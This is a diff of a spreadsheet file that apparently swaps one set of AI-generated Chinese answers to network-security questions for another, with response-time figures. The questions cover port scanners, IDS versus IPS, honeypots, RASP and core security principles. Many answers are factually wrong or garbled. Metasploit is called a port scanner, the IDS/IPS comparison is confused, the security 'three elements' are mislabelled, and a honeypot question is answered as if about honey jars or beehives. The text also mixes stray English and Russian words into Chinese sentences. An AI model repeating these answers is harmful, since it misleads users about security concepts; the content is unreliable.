       <c r="C147" t="inlineStr">
         <is>
-          <t>？
-一些软件可以帮助您扫描主机上的开放的端口和协议，以下是一些常用的软件：
-1. Nmap：Nmap 是一个非常流行的端口扫描工具，可以检查主机上的端口和协议是否打开。它可以检查 TCP、UDP、ICMP 等协议，并且可以同时扫描多个主机。
-2. Port Scan：Port Scan 是一款专门用于端口扫描的软件，可以帮助您扫描主机上的端口和协议。它可以检查 TCP、UDP 和 ICMP 端口，并且可以同时扫描多个主机。
-3. Nessus：Nessus 是一款跨平台的端口扫描工具，可以帮助您扫描主机上的端口和协议。它可以检查 TCP、UDP、ICMP 等协议，并且可以同时扫描多个主机。
-4. OpenVAS：OpenVAS 是一款基于 Nessus 的端口扫描工具，可以帮助您扫描主机上的端口和协议。它可以检查 TCP、UDP、ICMP 等协议，并且可以同时扫描多个主机。
-5. Metasploit：Metasploit 是一款跨平台的端口扫描工具，可以帮助您扫描主机上的端口和协议。它可以检查 TCP、UDP、ICMP 等协议，并且可以同时扫描多个主机。
-这些软件都可以帮助您扫描主机上的端口和协议，但是需要注意的是，不能进行敏感资源的扫描，以避免违反法律和违反网络安全规定。&lt;/s&gt;</t>
+          <t>如果您需要扫描主机开放的端口和协议，可以使用一些常用的软件工具。以下是一些常用的软件工具：
+1. `nmap`：nmap 是一个强大的端口扫描工具，可以扫描主机的端口和协议，并提供详细的扫描结果。它可以检测到多种协议，包括 TCP、UDP、ICMP 等。
+2. `tcpdump`：tcpdump 是一个流行的网络观察工具，可以monitor 和诊断 TCP 和 UDP 流量。它可以检测到多种协议，包括 HTTP、FTP、SMTP 等。
+3. `Wireshark`：Wireshark 是一个强大的网络观察和分析工具，可以检测到多种协议，包括 TCP、UDP、ICMP 等。它可以monitor 和诊断网络流量，并提供详细的扫描结果。
+4. `Nessus`：Nessus 是一个强大的安全扫描工具，可以扫描主机的端口和协议，并提供详细的扫描结果。它可以检测到多种安全漏洞，包括 SQL  injection、XSS 攻击等。
+5. `OpenVAS`：OpenVAS 是一个强大的安全扫描工具，可以扫描主机的端口和协议，并提供详细的扫描结果。它可以检测到多种安全漏洞，包括 SQL  injection、XSS 攻击等。
+这些软件工具可以帮助您快速扫描主机开放的端口和协议，并提供详细的扫描结果。但请注意，扫描主机的端口和协议可能会受到隐私和安全限制，因此请务必遵守相关的法律和标准。</t>
         </is>
       </c>
       <c r="D147" t="n">
-        <v>18.51526856422424</v>
+        <v>19.11006283760071</v>
       </c>
     </row>
     <row r="148">
@@ -5024,21 +5004,20 @@
       </c>
       <c r="C148" t="inlineStr">
         <is>
-          <t>？ - 软件知识网
-IDS和IPS都是防火墙技术的一部分，它们的主要目标是防止攻击者入侵和破坏网络系统。然而，它们之间有一些区别。
-IDS（Intrusion Detection System）是一种快速监视网络通信，以发现和识别潜在的攻击活动。它通常会记录和分析网络传输的数据，以便在攻击发生时快速做出响应。IDS通常不会自动阻挡攻击，而是通知管理员或安全系统，让他们做出相应的处理。
-IPS（Intrusion Prevention System）是一种防火墙技术，可以自动阻挡攻击，以防止攻击者进入网络系统。IPS会根据配置规则和数据分析，自动阻挡未经授权的访问attempts，或者修改网络包头来防止攻击。
-主要区别：
-1. 检测 vs. 防御：IDS只是检测攻击，而IPS则能够自动阻挡攻击。
-2. 响应速度：IDS通常比IPS更快，因为它们需要更快地记录和分析网络数据。
-3. 检测精度：IDS可能会false positive，而IPS通常能够提供更高的检测精度。
-4. 扩展性：IDS通常更容易扩展和集成，因为它们通常提供更多的数据和log数据。
-5. 预测能力：IDS通常不能提供预测能力，而IPS可以基于前一次攻击来预测下一次攻击。
-总的来说，IDS和IPS都是防火墙技术的一部分，但它们之间有一些区别。IDS通常更快、更容易扩展，但不能自动阻挡攻击，而IPS可以自动阻挡攻击，但需要更多的配置和数据分析。在实际应用中，通常会使用一种拥有IDS和IPS功能的防火墙甚至是一个组合的防御系统来提高防御能力。&lt;/s&gt;</t>
+          <t>IDS（Intrusion Detection System）和IPS（Intrusion Prevention System）都是用于防止网络攻击和保护网络安全的系统，但它们在具体的设计和用途上有一些区别。
+IDS是一种静态分析和预测的方法，它可以监控网络传输数据，检测和警告发现可疑的攻击行为。IDS通常包括以下几个方面：
+1. 网络防火墙：监控网络上的入侵和数据传输，检测和阻止不可信的网络流量。
+2. 网络检查：监控网络上的不同点，检测和警告发现可疑的网络异常行为。
+3. 应用防火墙：监控应用程序的行为，检测和阻止可能的攻击。
+IPS是一种动态防御和阻止的方法，它可以在网络中实时检测和阻止攻击行为。IPS通常包括以下几个方面：
+1. 网络防御：实时检测和阻止不可信的网络流量，防止攻击行为的实施。
+2. 应用防御：阻止可能的攻击行为，例如尝试访问禁止的资源或尝试利用漏洞攻击系统。
+3. 防御策略：根据威胁情况和网络环境而定，实现适应式防御。
+总的来说，IDS主要是进行静态分析和预测，而IPS则是进行实时防御和阻止。IDS可以检测到可疑行为，但是无法阻止攻击行为，而IPS可以阻止攻击行动，但是需要与网络设备和应用程序进行交互。因此，在实际应用中，通常会使用 Both IDS和IPS together，以确保网络的安全性和可靠性。</t>
         </is>
       </c>
       <c r="D148" t="n">
-        <v>21.01599216461182</v>
+        <v>18.60916209220886</v>
       </c>
     </row>
     <row r="149">
@@ -5052,18 +5031,18 @@
       </c>
       <c r="C149" t="inlineStr">
         <is>
-          <t>？
-蜜罐是一种用于储存和transport蜂蜜的容器，通常由瓷器或塑料制成，有各种形状和大小。蜜罐通常用于以下方法：
-1. 储存蜂蜜：蜜罐可以用来储存蜂蜜，让蜜可以保持在干燥和防水的环境中，以防止蜜腐化或损坏。
-2. Transport蜜：蜜罐可以用来 Transport 蜜到不同的地方，例如从另一个培饶场到工厂或者直接到市场上销售。
-3. 储存其他食品：蜜罐也可以用来储存其他食品，例如酒精、植物油、蔬菜和豆粕等。
-4. 工业应用：蜜罐也可以用于工业应用，例如在酿酒、蜂蜜厂、肉类加工等领域。
-5. 厂家生产：蜜罐也可以用于厂家生产的储存和Transport 蜜的需求。
-总之，蜜罐是一种多用途的容器，用于储存和Transport 蜜，它可以满足不同的需求和应用场景。&lt;/s&gt;</t>
+          <t>A beehive is used for?
+1. To produce honey
+2. To store honey
+3. To house bees
+4. To pollinate flowers
+5. To make beeswax
+Answer:
+The beehive is used for all of the above purposes! Bees use their hives to store honey, house bees, and pollinate flowers. The beeswax produced by the bees is also harvested from the hive.</t>
         </is>
       </c>
       <c r="D149" t="n">
-        <v>11.70718264579773</v>
+        <v>2.76368236541748</v>
       </c>
     </row>
     <row r="150">
@@ -5077,19 +5056,18 @@
       </c>
       <c r="C150" t="inlineStr">
         <is>
-          <t>？
-RASP（Run-time Application Self-Protection）是一种网络安全技术，它在软件运行时层次实现应用程序的自我保护功能，通过对软件的运行流程进行检测和防范，实现了应用程序的安全性和可靠性。
-RASP技术的作用有以下几个方面：
-1. 防止攻击：RASP技术可以检测和防止敏感数据泄露、恶意攻击和其他威胁，保护应用程序和网络安全。
-2. 防止恶意软件：RASP技术可以对软件进行实时检测和防止恶意软件的执行，包括代码签名验证、执行风险评估和攻击防御等。
-3. 提高应用程序的可靠性：RASP技术可以帮助应用程序快速恢复自己或环境受损的情况，提高应用程序的可靠性和可用性。
-4. 减轻安全管理工作岗：RASP技术可以自动执行安全管理任务，减轻开发人员和安全管理员的工作岗。
-5. 增加应用程序的安全隐私：RASP技术可以帮助应用程序保护自己的安全隐私，防止敏感数据外泄和不安全的数据传输。
-总之，RASP技术可以帮助保护应用程序和网络安全，提高应用程序的可靠性和可用性，并减轻安全管理工作岗。&lt;/s&gt;</t>
+          <t>RASP（Run-time Application Self-Protection）技术是一种可以在运行时自动检测和防范恶意软件行为的安全技术。RASP技术可以在软件运行过程中监控和检查应用程序的行为，检测到恶意软件或攻击者的行为，并立即采取防范措施。
+RASP技术有以下作用：
+1. 防止恶意软件攻击：RASP技术可以检测和防止恶意软件攻击，包括跟踪、监控和防止恶意软件的访问和修改。
+2. 防止数据泄露：RASP技术可以防止数据泄露，包括防止恶意软件访问和修改敏感数据，以防止敏感数据泄露。
+3. 提高应用程序的安全性：RASP技术可以提高应用程序的安全性，降低应用程序受到攻击的风险，从而提高了企业的安全性。
+4. 降低安全更新和维护成本：RASP技术可以降低安全更新和维护成本，因为它可以自动检测和防范恶意软件行为，从而减少了安全更新和维护的需求。
+5. 提高应用程序的可靠性：RASP技术可以提高应用程序的可靠性，降低了应用程序受到攻击和崩溃的风险，从而提高了企业的可靠性。
+总之，RASP技术可以为企业提供一个高效的安全保护环境，降低了企业受到攻击和崩溃的风险，提高了企业的安全性和可靠性。</t>
         </is>
       </c>
       <c r="D150" t="n">
-        <v>15.87781810760498</v>
+        <v>18.06820130348206</v>
       </c>
     </row>
     <row r="151">
@@ -5103,16 +5081,15 @@
       </c>
       <c r="C151" t="inlineStr">
         <is>
-          <t>？
-网络安全三要素指的是指一种网络安全的重要理念，即网络安全的基础是 три要素：
-1. 身份验证（Authentication）：确保企业或个人在网络上的身份是正确的，防止不法分子或黑客篡改或伪造数据。
-2. 身份验证（Authorization）：确保企业或个人在网络上拥有相应的权限和访问权，防止不法分子或黑客访问或操作敏感数据。
-3. 数据integrity（Integrity）：确保网络上的数据完整性和完整性，防止不法分子或黑客篡改或删除数据。
-这三要素组成了一个完整的网络安全体系，可以确保企业或个人的网络数据安全。&lt;/s&gt;</t>
+          <t>网络安全三要素指的是指在保护网络安全和隐私时具有重要作用的三个方面：
+1. 身份验证（Identity Verification）：确保用户的身份和权限，防止黑客访问或操作网络资源。
+2. 数据加密（Data Encryption）：使用加密算法来保护数据的安全性和隐私性，防止黑客访问或修改数据。
+3. 访问控制（Access Control）：控制用户访问网络资源的权限，防止黑客访问或操作不应该的资源。
+这三要素可以帮助保护网络安全和隐私，防止黑客破坏或摘要网络资源，保护用户的个人隐私和财富。</t>
         </is>
       </c>
       <c r="D151" t="n">
-        <v>7.904617309570312</v>
+        <v>7.869633436203003</v>
       </c>
     </row>
   </sheetData>
